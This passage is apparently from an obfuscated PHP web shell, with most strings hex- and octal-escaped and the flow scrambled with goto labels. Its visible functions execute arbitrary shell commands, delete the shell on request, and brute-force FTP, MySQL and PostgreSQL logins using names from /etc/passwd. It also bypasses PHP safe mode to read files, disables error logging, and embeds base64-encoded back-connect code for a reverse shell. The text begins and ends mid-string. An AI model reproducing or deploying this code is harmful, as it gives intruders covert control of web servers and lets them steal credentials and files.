"\x3e\x20\x72\145\144\151\162\x65\143\x74\40\x73\164\x64\x65\x72\x72\x20\164\x6f\x20\x73\164\x64\x6f\x75\164\40\50\x32\x3e\46\x31\51\74\57\x6e\x6f\142\162\76\74\x62\x72\x2f\x3e\x3c\x74\x65\x78\x74\x61\162\x65\x61\x20\x63\154\x61\163\163\75\142\151\147\x61\162\x65\x61\x20\x6e\141\x6d\x65\75\157\x75\164\x70\x75\164\40\x73\164\171\154\145\75\42\142\x6f\162\144\145\162\x2d\142\157\x74\x74\157\155\x3a\60\x3b\155\141\x72\x67\151\x6e\x2d\164\x6f\x70\x3a\x35\160\170\73\42\x20\162\145\x61\144\x6f\x6e\154\171\76"; if (!empty($_POST["\x70\x31"])) { echo htmlspecialchars("\x24\x20" . $_POST["\x70\x31"] . "\xa" . ex($_POST["\160\61"])); } echo "\74\x2f\164\145\170\164\x61\x72\x65\141\x3e\74\x74\141\x62\x6c\145\x20\x73\x74\x79\x6c\x65\75\42\142\x6f\x72\x64\145\x72\x3a\61\x70\170\x20\x73\157\x6c\x69\144\40\x23\60\x36\x30\x61\61\60\x3b\x62\141\143\153\x67\162\157\x75\156\144\55\143\157\x6c\x6f\162\x3a\43\x30\66\x30\141\61\60\x3b\x62\157\162\144\x65\162\x2d\x74\x6f\160\x3a\60\x70\170\x3b\x22\x20\143\145\x6c\x6c\x70\141\144\144\x69\x6e\147\x3d\x30\40\x63\x65\154\154\x73\160\x61\143\x69\156\147\x3d\x30\x20\x77\151\x64\x74\150\75\x22\61\x30\60\x25\x22\x3e\74\164\x72\76\74\164\144\x20\x73\164\171\154\145\75\x22\160\141\x64\x64\x69\156\147\55\154\x65\x66\x74\x3a\x34\160\170\73\x20\x77\x69\144\164\150\72\61\63\x70\170\73\42\76\44\74\x2f\164\x64\x3e\74\164\x64\x3e\x3c\151\156\160\x75\x74\40\x74\171\160\x65\x3d\164\145\170\164\40\x6e\x61\x6d\x65\x3d\143\155\144\x20\163\164\x79\154\x65\x3d\x22\x62\157\162\144\145\x72\x3a\x30\x70\170\73\167\x69\x64\x74\x68\72\61\60\x30\x25\73\42\x20\x6f\156\x6b\145\x79\x64\x6f\x77\x6e\x3d\x22\x6b\160\50\145\x76\x65\x6e\164\x29\x3b\42\76\74\57\x74\144\76\74\x2f\164\162\76\74\x2f\164\x61\x62\154\145\76"; echo "\74\x2f\x66\157\x72\x6d\76\74\x2f\x64\151\166\76\74\163\x63\162\x69\x70\x74\76\144\x2e\143\x66\56\x63\155\x64\56\146\x6f\143\x75\x73\50\x29\x3b\x3c\x2f\x73\x63\162\151\x70\164\x3e"; hardFooter(); } goto xWgYK; asFIH: function actionSelfRemove() { if ($_POST["\x70\x31"] == "\x79\145\x73") { if (@unlink(preg_replace("\x21\134\x28\134\x64\x2b\x5c\51\x5c\163\x2e\x2a\x21", '', __FILE__))) { die("\123\x68\x65\x6c\x6c\40\x68\x61\163\x20\x62\x65\x65\156\40\162\145\155\x6f\x76\x65\144"); } else { echo "\165\x6e\154\151\156\x6b\40\x65\x72\x72\157\162\x21"; } } if ($_POST["\160\x31"] != "\171\145\163") { hardHeader(); } echo "\74\150\x31\x3e\123\165\151\143\151\144\145\74\x2f\150\61\76\x3c\144\x69\166\40\143\154\x61\x73\163\x3d\143\x6f\x6e\164\145\156\x74\76\x52\x65\x61\x6c\154\171\x20\x77\141\156\164\40\x74\x6f\x20\x72\145\x6d\157\x76\x65\40\x74\x68\x65\x20\163\x68\145\x6c\154\77\74\x62\162\76\74\x61\40\x68\x72\145\146\75\43\x20\157\156\x63\x6c\x69\143\x6b\75\42\x67\x28\156\x75\154\x6c\x2c\156\x75\154\x6c\x2c\47\x79\x65\163\x27\51\x22\x3e\x59\x65\x73\74\x2f\141\76\74\x2f\144\151\x76\x3e"; hardFooter(); } goto eHsyk; gS860: function perms($p) { if (($p & 49152) == 49152) { $i = "\x73"; } elseif (($p & 40960) == 40960) { $i = "\154"; } elseif (($p & 32768) == 32768) { $i = "\x2d"; } elseif (($p & 24576) == 24576) { $i = "\x62"; } elseif (($p & 16384) == 16384) { $i = "\144"; } elseif (($p & 8192) == 8192) { $i = "\x63"; } elseif (($p & 4096) == 4096) { $i = "\x70"; } else { $i = "\x75"; } $i .= $p & 256 ? "\x72" : "\x2d"; $i .= $p & 128 ? "\167" : "\x2d"; $i .= $p & 64 ? $p & 2048 ? "\x73" : "\170" : ($p & 2048 ? "\x53" : "\x2d"); $i .= $p & 32 ? "\162" : "\x2d"; $i .= $p & 16 ? "\167" : "\55"; $i .= $p & 8 ? $p & 1024 ? "\x73" : "\x78" : ($p & 1024 ? "\x53" : "\55"); $i .= $p & 4 ? "\162" : "\x2d"; $i .= $p & 2 ? "\x77" : "\55"; $i .= $p & 1 ? $p & 512 ? "\x74" : "\x78" : ($p & 512 ? "\x54" : "\55"); return $i; } goto y4kgJ; f9sl9: function actionBruteforce() { hardHeader(); if (isset($_POST["\x70\x72\x6f\164\x6f"])) { echo "\74\x68\61\76\122\x65\x73\x75\154\x74\163\74\x2f\x68\61\x3e\74\144\151\x76\40\143\x6c\141\x73\x73\75\143\157\156\x74\x65\x6e\164\x3e\74\163\x70\x61\x6e\x3e\x54\171\160\145\x3a\x3c\x2f\163\x70\x61\156\x3e\40" . htmlspecialchars($_POST["\x70\162\x6f\x74\x6f"]) . "\40\x3c\x73\160\x61\x6e\76\123\x65\x72\166\145\x72\72\x3c\57\x73\160\141\x6e\x3e\x20" . htmlspecialchars($_POST["\x73\x65\x72\166\145\162"]) . "\74\142\x72\76"; if ($_POST["\160\162\157\x74\x6f"] == "\x66\x74\160") { function bruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) { return false; } $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST["\x70\162\x6f\164\x6f"] == "\x6d\171\x73\x71\154") { function bruteForce($ip, $port, $login, $pass) { $res = @mysql_connect($ip . "\x3a" . ($port ? $port : 3306), $login, $pass); @mysql_close($res); return $res; } } elseif ($_POST["\160\162\x6f\164\157"] == "\x70\147\163\x71\154") { function bruteForce($ip, $port, $login, $pass) { $str = "\x68\157\x73\164\x3d\x27" . $ip . "\x27\40\x70\x6f\162\164\75\x27" . $port . "\x27\x20\165\x73\x65\x72\x3d\x27" . $login . "\x27\40\160\141\x73\x73\x77\x6f\162\144\x3d\x27" . $pass . "\x27\x20\x64\142\x6e\141\x6d\x65\75\x70\x6f\163\164\147\x72\x65\163"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode("\72", $_POST["\163\145\x72\x76\x65\x72"]); if ($_POST["\x74\x79\x70\145"] == 1) { $temp = @file("\x2f\145\x74\x63\57\x70\x61\163\x73\167\144"); if (is_array($temp)) { foreach ($temp as $line) { $line = explode("\x3a", $line); ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "\x3c\x62\76" . htmlspecialchars($line[0]) . "\x3c\57\142\76\72" . htmlspecialchars($line[0]) . "\74\142\x72\76"; } if (@$_POST["\162\145\x76\x65\x72\x73\145"]) { $tmp = ''; for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "\74\142\x3e" . htmlspecialchars($line[0]) . "\x3c\x2f\x62\x3e\x3a" . htmlspecialchars($tmp); } } } } } elseif ($_POST["\x74\x79\160\145"] == 2) { $temp = @file($_POST["\x64\x69\143\x74"]); if (is_array($temp)) { foreach ($temp as $line) { $line = trim($line); ++$attempts; if (bruteForce($server[0], @$server[1], $_POST["\154\157\x67\x69\156"], $line)) { $success++; echo "\74\x62\x3e" . htmlspecialchars($_POST["\x6c\x6f\x67\151\x6e"]) . "\x3c\57\142\x3e\72" . htmlspecialchars($line) . "\x3c\142\162\x3e"; } } } } echo "\74\x73\160\x61\x6e\76\x41\164\x74\x65\155\x70\164\x73\x3a\74\57\163\160\141\156\76\x20{$attempts}\x20\x3c\x73\160\141\x6e\x3e\123\165\x63\143\x65\163\163\72\x3c\57\x73\160\141\156\x3e\40{$success}\x3c\57\144\151\x76\76\74\142\x72\76"; } echo "\74\150\x31\76\106\124\x50\40\142\162\165\164\145\146\157\162\143\145\x3c\x2f\x68\x31\x3e\74\x64\151\x76\40\x63\154\141\163\163\75\143\x6f\x6e\164\145\156\x74\x3e\74\164\141\142\x6c\145\76\x3c\146\x6f\x72\x6d\x20\x6d\x65\164\150\157\x64\x3d\x70\x6f\163\x74\x3e\x3c\164\x72\x3e\74\x74\x64\x3e\x3c\163\x70\141\x6e\x3e\x54\x79\160\145\74\57\x73\160\x61\156\76\74\x2f\164\144\76" . "\74\x74\144\76\x3c\154\x61\x62\145\x6c\76\74\x73\x65\x6c\x65\x63\x74\40\x6e\x61\x6d\145\x3d\x70\162\157\x74\x6f\76\74\157\160\x74\151\x6f\x6e\40\x76\141\x6c\x75\x65\x3d\x66\x74\160\x3e\x46\124\120\x3c\57\x6f\160\x74\151\157\x6e\x3e\x3c\157\160\x74\151\157\x6e\x20\166\141\x6c\165\145\x3d\155\171\163\161\154\76\x4d\x79\x53\x71\154\74\57\x6f\x70\164\151\x6f\x6e\76\x3c\157\x70\x74\151\157\156\40\x76\141\x6c\x75\x65\75\160\x67\x73\x71\154\x3e\x50\x6f\163\x74\147\162\145\x53\x71\x6c\74\x2f\x6f\x70\x74\151\157\156\76\x3c\57\x73\145\154\x65\x63\x74\76\74\57\x6c\141\x62\x65\154\x3e\74\x2f\164\144\x3e\x3c\x2f\164\162\76\x3c\x74\162\76\74\x74\x64\76" . "\74\151\x6e\160\x75\164\40\x74\x79\160\x65\x3d\150\x69\x64\x64\145\x6e\40\156\141\x6d\x65\x3d\143\x20\x76\141\154\165\145\75\42" . htmlspecialchars($GLOBALS["\143\x77\144"]) . "\42\x3e" . "\x3c\x69\x6e\160\x75\x74\x20\164\x79\160\145\75\150\x69\144\144\145\x6e\x20\x6e\141\x6d\x65\x3d\x61\40\166\x61\154\165\145\x3d\42" . htmlspecialchars($_POST["\x61"]) . "\42\x3e" . "\74\151\x6e\160\x75\164\x20\x74\x79\160\x65\x3d\x68\x69\144\144\x65\156\40\156\x61\155\x65\75\143\150\x61\162\163\145\x74\x20\x76\x61\x6c\x75\x65\75\42" . htmlspecialchars($_POST["\x63\x68\141\162\163\x65\x74"]) . "\42\x3e" . "\x3c\151\156\160\x75\164\x20\164\x79\160\145\x3d\x68\x69\144\x64\145\156\40\156\x61\x6d\x65\75\156\x65\40\x20\166\141\154\165\145\75\x22\42\76" . "\x3c\x73\x70\x61\x6e\76\123\145\x72\166\x65\162\72\160\157\162\164\74\x2f\163\x70\x61\156\x3e\x3c\57\x74\144\76" . "\74\164\x64\x3e\74\151\156\x70\x75\x74\40\164\171\160\x65\75\164\x65\x78\164\x20\x6e\x61\x6d\145\75\163\145\162\x76\145\x72\x20\166\x61\154\165\145\x3d\x22\x31\62\67\x2e\x30\56\x30\56\61\x22\x3e\x3c\x2f\x74\x64\76\x3c\x2f\x74\162\x3e" . "\x3c\164\x72\x3e\x3c\x74\144\76\74\x73\x70\x61\156\x3e\102\x72\165\164\145\40\164\x79\160\x65\x3c\x2f\163\160\141\x6e\x3e\x3c\x2f\164\x64\x3e" . "\x3c\x74\144\x3e\x3c\151\x6e\160\165\x74\40\164\171\x70\145\x3d\162\x61\x64\x69\x6f\x20\156\141\x6d\145\75\x74\171\x70\x65\40\166\141\x6c\165\145\x3d\x22\x31\42\x20\143\x68\x65\x63\x6b\145\144\76\40\x2f\x65\x74\x63\57\x70\141\163\x73\167\x64\x3c\x2f\164\144\76\x3c\x2f\x74\x72\76" . "\74\x74\162\76\74\164\x64\x3e\74\57\164\144\76\74\x74\144\x20\x73\x74\171\x6c\x65\75\42\x70\x61\144\144\151\x6e\x67\x2d\154\x65\146\x74\72\61\x35\x70\170\42\76\x3c\x69\156\x70\165\164\x20\164\x79\160\x65\75\x63\x68\145\143\x6b\142\x6f\170\40\156\141\155\145\75\162\x65\166\145\162\163\145\40\x76\141\x6c\165\145\x3d\61\x20\143\x68\x65\x63\x6b\x65\x64\76\x20\162\145\166\145\162\163\x65\x20\50\154\157\x67\151\x6e\40\55\x3e\40\x6e\151\147\157\x6c\x29\x3c\x2f\x74\x64\x3e\74\57\x74\162\x3e" . "\74\164\x72\76\74\x74\144\76\x3c\x2f\x74\x64\x3e\74\x74\x64\x3e\74\x69\x6e\160\x75\x74\x20\164\171\x70\x65\75\x72\x61\144\x69\157\x20\156\x61\x6d\145\x3d\164\x79\x70\145\40\166\x61\x6c\165\145\x3d\42\62\x22\76\x20\x44\151\x63\164\151\157\x6e\x61\162\171\74\x2f\164\144\x3e\74\x2f\x74\162\x3e" . "\x3c\164\162\x3e\74\x74\144\x3e\x3c\57\x74\144\76\x3c\164\144\x3e\x3c\164\141\x62\x6c\145\x20\163\x74\x79\x6c\145\x3d\x22\x70\x61\x64\x64\x69\156\x67\55\154\145\x66\164\72\x31\x35\x70\x78\42\x3e\x3c\x74\x72\76\x3c\x74\144\x3e\x3c\x73\x70\x61\156\x3e\x4c\157\147\151\x6e\74\57\163\160\141\156\x3e\74\57\164\144\76" . "\x3c\x74\x64\76\74\151\x6e\x70\165\x74\40\x74\171\x70\x65\x3d\x74\145\x78\164\x20\156\141\x6d\145\75\154\x6f\x67\151\x6e\40\166\x61\154\165\145\75\x22\x72\157\x6f\164\x22\76\x3c\57\164\x64\76\74\57\x74\x72\x3e" . "\74\164\162\76\74\164\x64\x3e\74\x73\160\141\x6e\76\104\x69\143\x74\151\x6f\x6e\141\162\171\x3c\57\x73\160\141\x6e\x3e\x3c\57\164\144\x3e" . "\74\164\144\x3e\x3c\x69\x6e\x70\165\164\40\x74\171\x70\x65\75\164\x65\x78\164\x20\x6e\x61\155\145\x3d\x64\x69\143\x74\x20\x76\x61\154\165\145\x3d\42" . htmlspecialchars($GLOBALS["\143\167\x64"]) . "\160\x61\163\163\x77\144\56\144\151\x63\42\x3e\74\57\x74\144\x3e\74\57\x74\x72\x3e\x3c\x2f\164\141\x62\x6c\x65\76" . "\74\x2f\x74\144\x3e\x3c\57\x74\x72\x3e\74\x74\x72\76\74\x74\144\76\74\57\164\x64\x3e\x3c\x74\x64\x3e\x3c\151\x6e\160\x75\164\40\164\x79\x70\145\x3d\x73\165\x62\155\151\164\40\x76\141\154\165\x65\x3d\42\163\x75\142\x6d\151\164\x22\76\x3c\57\164\144\x3e\x3c\x2f\164\162\76\74\x2f\146\x6f\x72\155\x3e\x3c\57\164\x61\142\x6c\x65\76"; echo "\x3c\57\x64\x69\x76\76"; hardFooter(); } goto rGxXC; Xbodc: if (!function_exists("\147\x65\164\137\155\141\x67\151\143\x5f\x71\x75\157\x74\x65\163\x5f\147\160\x63") || get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map("\x73\164\162\151\160\163\x6c\141\163\150\145\163\x5f\x61\x72\x72\141\x79", $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); } goto p17RR; gaKKg: function actionSafeMode() { $temp = ''; ob_start(); switch ($_POST["\160\61"]) { case 1: $temp = @tempnam($test, "\x63\x78"); if (@copy("\x63\157\155\x70\x72\x65\163\163\56\172\154\151\142\x3a\x2f\57" . $_POST["\160\62"], $temp)) { echo @file_get_contents($temp); unlink($temp); } else { echo "\123\157\162\162\x79\56\x2e\x2e\x20\x43\141\156\47\164\40\x6f\x70\145\x6e\40\x66\x69\154\145"; } break; case 2: $files = glob($_POST["\160\62"] . "\52"); if (is_array($files)) { foreach ($files as $filename) { echo $filename . "\xa"; } } break; case 3: $ch = curl_init("\146\151\x6c\145\72\57\57" . $_POST["\160\62"] . "\0" . SELF_PATH); curl_exec($ch); break; case 4: ini_restore("\163\x61\x66\145\137\x6d\157\144\x65"); ini_restore("\x6f\160\145\x6e\137\x62\141\x73\x65\144\151\162"); include $_POST["\x70\62"]; break; case 5: for (; $_POST["\x70\x32"] <= $_POST["\x70\63"]; $_POST["\160\62"]++) { $uid = @posix_getpwuid($_POST["\x70\x32"]); if ($uid) { echo join("\x3a", $uid) . "\xa"; } } break; case 6: if (!function_exists("\151\x6d\141\160\137\x6f\x70\x65\156")) { break; } $stream = imap_open($_POST["\x70\62"], '', ''); if ($stream == FALSE) { break; } echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo "\74\150\x31\x3e\123\x61\x66\x65\40\x6d\x6f\144\x65\x20\142\x79\160\x61\x73\x73\x3c\x2f\150\61\76\74\x64\151\x76\40\x63\154\141\163\x73\75\x63\157\x6e\x74\x65\156\x74\x3e"; echo "\74\163\x70\141\x6e\x3e\103\x6f\160\x79\x20\x28\162\x65\141\x64\40\x66\151\x6c\x65\x29\x3c\57\x73\160\141\156\x3e\x3c\x66\x6f\x72\155\x20\x6f\x6e\163\x75\x62\x6d\151\x74\75\47\147\x28\x6e\x75\154\x6c\x2c\x6e\x75\154\154\54\x22\61\42\x2c\164\150\151\x73\x2e\160\x61\x72\x61\x6d\56\x76\141\x6c\x75\x65\51\73\x72\x65\164\165\x72\x6e\40\146\x61\154\163\x65\x3b\x27\x3e\74\151\x6e\x70\165\164\40\143\154\141\163\x73\75\x22\164\157\157\154\163\111\156\160\x22\40\x74\x79\160\x65\x3d\x74\x65\x78\x74\40\156\141\x6d\145\x3d\x70\141\162\x61\155\x3e\74\151\x6e\160\165\164\40\x74\171\x70\145\x3d\x73\x75\142\x6d\151\x74\x20\x76\141\x6c\165\x65\75\42\x73\165\x62\155\151\164\x22\x3e\74\57\x66\x6f\162\x6d\76\74\x62\x72\x3e\74\163\x70\x61\156\76\x47\x6c\x6f\142\40\x28\154\151\163\164\40\144\x69\x72\51\x3c\57\163\x70\x61\x6e\76\74\x66\157\162\155\x20\x6f\156\x73\165\142\x6d\x69\x74\75\47\147\x28\156\165\x6c\154\54\156\165\154\154\x2c\x22\62\x22\54\x74\150\x69\163\x2e\160\x61\x72\x61\x6d\x2e\x76\x61\x6c\165\145\x29\x3b\162\x65\x74\165\162\x6e\x20\x66\141\x6c\x73\145\73\x27\x3e\74\x69\x6e\160\x75\164\40\143\x6c\141\163\163\x3d\x22\x74\x6f\x6f\x6c\x73\x49\x6e\160\x22\x20\164\171\160\x65\75\164\145\170\164\40\156\141\155\x65\75\x70\x61\162\x61\155\76\74\x69\x6e\x70\x75\x74\x20\x74\x79\160\145\x3d\163\x75\x62\x6d\151\164\x20\x76\141\154\165\145\x3d\x22\163\x75\x62\x6d\x69\x74\42\76\x3c\x2f\146\157\x72\x6d\x3e\x3c\142\162\x3e\x3c\x73\160\141\x6e\76\103\165\162\x6c\40\x28\162\145\141\144\40\146\x69\154\145\51\74\x2f\163\160\x61\x6e\x3e\x3c\146\x6f\162\x6d\40\x6f\x6e\x73\x75\142\155\151\164\x3d\x27\147\x28\x6e\165\154\x6c\x2c\x6e\165\154\x6c\54\x22\63\42\54\164\150\151\163\56\x70\141\162\x61\155\56\x76\x61\x6c\165\145\51\73\162\145\x74\x75\x72\x6e\x20\x66\141\154\x73\x65\x3b\47\x3e\x3c\151\x6e\160\x75\x74\40\143\x6c\141\163\163\75\x22\164\157\x6f\x6c\x73\x49\156\x70\x22\40\x74\x79\160\145\75\164\145\170\x74\40\156\141\x6d\x65\75\x70\141\x72\x61\155\76\x3c\x69\x6e\x70\x75\x74\x20\164\171\x70\145\x3d\x73\165\142\155\x69\164\40\166\x61\154\165\x65\75\42\163\165\x62\155\x69\164\x22\x3e\x3c\57\146\x6f\x72\155\x3e\74\142\x72\76\x3c\163\160\x61\x6e\76\x49\x6e\151\137\162\x65\x73\164\157\x72\145\40\50\x72\145\141\144\x20\146\x69\154\x65\x29\74\57\163\160\141\x6e\x3e\74\146\157\x72\155\x20\157\x6e\x73\x75\x62\x6d\x69\164\75\x27\147\x28\156\x75\154\x6c\x2c\x6e\165\x6c\x6c\54\42\x34\42\x2c\164\x68\x69\163\56\x70\x61\162\141\x6d\x2e\166\141\x6c\165\145\x29\x3b\x72\x65\x74\165\x72\156\x20\x66\x61\x6c\163\145\73\47\x3e\x3c\x69\156\x70\x75\x74\x20\x63\154\x61\163\163\75\x22\x74\x6f\x6f\154\163\x49\156\x70\42\x20\164\171\x70\145\75\164\145\170\164\40\x6e\x61\x6d\x65\x3d\160\x61\x72\x61\x6d\x3e\x3c\x69\x6e\x70\x75\x74\x20\164\171\160\x65\x3d\163\x75\142\x6d\x69\x74\x20\x76\141\154\165\x65\75\x22\x73\x75\142\155\151\164\42\x3e\74\x2f\x66\157\162\x6d\x3e\x3c\142\x72\76\74\x73\160\x61\156\x3e\x50\x6f\x73\151\x78\137\147\x65\x74\160\x77\x75\x69\144\40\x28\42\x52\x65\141\144\42\x20\x2f\x65\x74\143\57\160\x61\x73\163\x77\144\51\74\x2f\163\160\x61\x6e\76\74\x74\x61\142\x6c\145\x3e\x3c\x66\x6f\x72\x6d\40\x6f\x6e\163\165\142\155\151\x74\75\47\147\x28\x6e\165\154\154\x2c\156\x75\154\x6c\x2c\42\65\x22\54\164\x68\x69\163\x2e\160\141\162\x61\155\61\x2e\166\141\x6c\x75\145\x2c\x74\150\x69\x73\x2e\x70\x61\162\141\x6d\x32\56\x76\141\x6c\x75\x65\x29\73\x72\x65\x74\x75\162\156\x20\146\x61\154\163\x65\x3b\47\x3e\x3c\x74\x72\x3e\x3c\164\x64\x3e\x46\x72\x6f\155\74\57\x74\144\x3e\74\164\144\76\74\x69\x6e\x70\165\x74\40\164\171\x70\x65\75\164\145\170\x74\40\x6e\141\155\145\75\x70\141\x72\141\155\x31\x20\x76\141\154\x75\x65\75\60\x3e\x3c\x2f\x74\144\76\x3c\x2f\x74\162\x3e\x3c\164\x72\76\x3c\x74\x64\x3e\x54\157\x3c\57\x74\x64\76\x3c\x74\x64\76\x3c\x69\156\160\x75\x74\40\164\x79\x70\x65\x3d\x74\145\170\164\x20\x6e\141\155\145\75\160\141\x72\141\155\62\40\166\x61\x6c\165\x65\x3d\x31\x30\60\x30\76\74\x2f\x74\x64\76\x3c\x2f\164\162\76\74\x2f\164\x61\x62\x6c\145\x3e\x3c\151\x6e\x70\x75\164\40\164\171\x70\x65\x3d\163\x75\x62\155\x69\x74\x20\x76\x61\x6c\x75\x65\x3d\42\x73\165\142\155\x69\164\42\76\74\57\146\157\x72\x6d\76\x3c\142\162\x3e\74\142\x72\76\x3c\163\160\x61\156\x3e\111\x6d\141\160\137\157\160\x65\x6e\40\x28\x72\145\x61\144\x20\146\151\154\145\x29\x3c\x2f\x73\160\141\x6e\x3e\74\146\157\x72\x6d\x20\157\156\163\x75\x62\155\151\164\x3d\x27\x67\x28\x6e\x75\154\x6c\54\x6e\165\x6c\x6c\x2c\42\x36\x22\54\x74\150\x69\163\56\x70\141\162\141\155\56\x76\x61\154\165\x65\x29\73\162\x65\x74\x75\162\156\40\146\141\154\163\x65\x3b\x27\76\x3c\151\x6e\160\165\x74\40\x74\x79\x70\145\75\164\145\170\x74\40\x6e\141\x6d\145\x3d\160\141\162\x61\155\76\74\x69\156\160\x75\x74\x20\x74\171\160\145\x3d\x73\x75\142\155\x69\164\40\166\x61\x6c\165\145\75\x22\x73\165\x62\155\151\164\42\x3e\x3c\57\146\x6f\x72\155\76"; if ($temp) { echo "\74\x70\162\145\x20\x63\154\x61\163\x73\75\x22\x6d\x6c\61\42\x20\x73\x74\x79\x6c\145\75\42\x6d\x61\162\x67\x69\x6e\x2d\164\x6f\160\x3a\65\x70\170\x22\x20\x69\x64\75\42\117\x75\x74\160\165\164\x22\x3e" . $temp . "\74\57\160\162\145\x3e"; } echo "\x3c\x2f\x64\151\166\x3e"; hardFooter(); } goto urnx6; ZjyZB: if (!empty($_POST["\141"]) && function_exists("\x61\x63\164\x69\157\156" . $_POST["\x61"])) { call_user_func("\x61\143\164\151\157\156" . $_POST["\141"]); } goto G6Uv3; R8xcz: function decrypt($str, $pwd) { $pwd = base64_encode($pwd); $str = base64_decode($str); $enc_chr = ''; $enc_str = ''; $i = 0; while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) { break; } } } return base64_decode($enc_str); } goto w0nra; wlqmv: $cwd = @getcwd(); goto vmP50; nbi9R: function viewSize($s) { if ($s >= 1073741824) { return sprintf("\45\x31\56\x32\146", $s / 1073741824) . "\x20\x47\102"; } elseif ($s >= 1048576) { return sprintf("\45\x31\x2e\x32\x66", $s / 1048576) . "\40\115\x42"; } elseif ($s >= 1024) { return sprintf("\45\x31\x2e\62\x66", $s / 1024) . "\40\x4b\102"; } else { return $s . "\x20\x42"; } } goto gS860; KGlJ0: if (strtolower(substr(PHP_OS, 0, 3)) == "\x77\151\x6e") { $os = "\x77\151\156"; } else { $os = "\156\x69\170"; } goto JCS_A; qDiW5: $ = "\106\x69\x6c\145\x73\x4d\141\x6e"; goto WeQHr; xxz2n: if (!$safe_mode) { error_reporting(0); } goto E3hGz; w0nra: @ini_set("\x65\162\x72\157\x72\137\x6c\x6f\x67", NULL); goto hwJg4; BKw4L: if (version_compare(PHP_VERSION, "\x35\x2e\x33\56\x30", "\x3c")) { set_magic_quotes_runtime(0); } goto IjCwH; E3hGz: $disable_functions = @ini_get("\144\151\x73\141\x62\154\145\137\x66\x75\156\143\x74\151\x6f\156\x73"); goto WJp40; w9TDR: function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto uwRUw; B0PbS: if (!isset($_COOKIE[md5($_SERVER["\x48\124\x54\120\137\110\x4f\x53\x54"]) . "\141\152\141\x78"])) { $_COOKIE[md5($_SERVER["\x48\x54\x54\120\x5f\x48\117\123\124"]) . "\141\x6a\x61\170"] = (bool) $; } goto PtFVC; UOKiC: if (empty($_POST["\x63\x68\141\x72\x73\x65\x74"])) { $_POST["\x63\150\x61\x72\163\145\x74"] = $; } goto FVur6; et3or: function actionNetwork() { hardHeader(); $back_connect_c = "\x49\x32\154\165\x59\62\170\x31\x5a\107\x55\147\120\110\116\x30\132\x47\x6c\x76\x4c\155\x67\53\x44\x51\157\x6a\x61\x57\x35\x6a\142\110\x56\x6b\132\x53\101\x38\x63\63\154\172\114\x33\116\x76\x59\x32\164\x6c\144\x43\65\157\120\x67\60\113\x49\x32\x6c\x75\x59\x32\x78\x31\132\x47\125\x67\120\x47\65\154\144\107\x6c\165\132\130\121\x76\141\x57\x34\x75\x61\x44\64\116\103\155\154\165\144\103\x42\164\131\x57\x6c\x75\x4b\x47\x6c\165\144\103\x42\150\143\x6d\x64\x6a\x4c\103\x42\x6a\141\x47\106\x79\111\x43\x70\150\143\x6d\x64\x32\x57\61\x30\160\111\x48\x73\x4e\x43\x69\101\147\111\x43\x42\160\x62\156\x51\147\x5a\x6d\x51\67\x44\x51\x6f\x67\111\x43\101\x67\143\x33\122\171\144\x57\x4e\60\x49\110\116\166\131\x32\x74\x68\x5a\x47\122\x79\x58\x32\x6c\x75\x49\x48\x4e\x70\142\x6a\163\116\x43\151\101\147\111\x43\x42\153\131\127\126\x74\x62\x32\x34\157\x4d\x53\167\167\113\124\163\x4e\103\151\101\x67\x49\103\x42\172\141\x57\x34\165\x63\x32\x6c\x75\130\x32\132\150\x62\127\x6c\x73\x65\123\101\x39\111\x45\x46\107\x58\60\x6c\117\x52\x56\121\67\104\121\x6f\147\x49\103\x41\147\x63\62\154\x75\x4c\156\x4e\x70\x62\x6c\x39\x77\x62\x33\112\60\x49\x44\x30\x67\141\x48\x52\x76\142\156\115\x6f\x59\x58\122\166\x61\123\150\x68\x63\155\x64\62\127\x7a\112\144\113\123\153\x37\104\121\x6f\x67\x49\103\x41\147\143\x32\x6c\165\x4c\x6e\116\x70\142\x6c\x39\x68\x5a\x47\122\x79\x4c\x6e\116\x66\x59\127\122\153\143\x69\101\x39\x49\107\x6c\x75\x5a\130\x52\x66\x59\127\122\x6b\x63\151\150\x68\143\x6d\x64\62\127\172\106\144\x4b\x54\x73\x4e\103\151\x41\147\x49\x43\102\155\x5a\x43\x41\71\111\x48\x4e\166\x59\x32\x74\x6c\144\103\150\x42\122\154\71\x4a\x54\153\x56\125\x4c\103\x42\124\x54\x30\116\x4c\130\61\x4e\125\125\153\126\x42\124\x53\x77\x67\123\x56\x42\x51\x55\153\71\x55\x54\61\71\125\121\61\101\x70\111\x44\163\x4e\103\x69\101\147\x49\x43\102\160\x5a\151\101\x6f\113\107\x4e\x76\x62\155\65\x6c\131\x33\121\157\132\155\x51\x73\111\103\x68\x7a\144\110\112\x31\131\63\121\147\143\x32\x39\152\x61\62\x46\x6b\132\x48\x49\x67\113\151\x6b\147\x4a\x6e\116\x70\142\x69\x77\147\143\62\x6c\66\x5a\x57\x39\x6d\113\110\116\60\x63\x6e\126\152\x64\103\x42\x7a\x62\x32\116\x72\131\x57\x52\153\x63\x69\153\x70\x4b\124\167\167\x4b\x53\x42\x37\104\121\x6f\x67\111\x43\101\x67\111\103\x41\x67\x49\x48\x42\x6c\x63\x6e\x4a\x76\x63\x69\x67\x69\x51\x32\71\165\142\x6d\126\x6a\144\103\x42\x6d\x59\127\x6c\163\x49\151\x6b\x37\104\121\157\x67\x49\103\x41\x67\x49\103\101\147\111\110\112\154\x64\x48\126\x79\x62\151\x41\167\x4f\167\x30\113\111\103\101\x67\111\110\60\116\x43\x69\101\147\x49\x43\x42\x6b\x64\130\101\171\x4b\107\132\x6b\114\103\101\167\113\124\x73\116\103\151\101\147\x49\103\x42\153\x64\x58\101\x79\113\x47\x5a\153\114\x43\101\170\x4b\x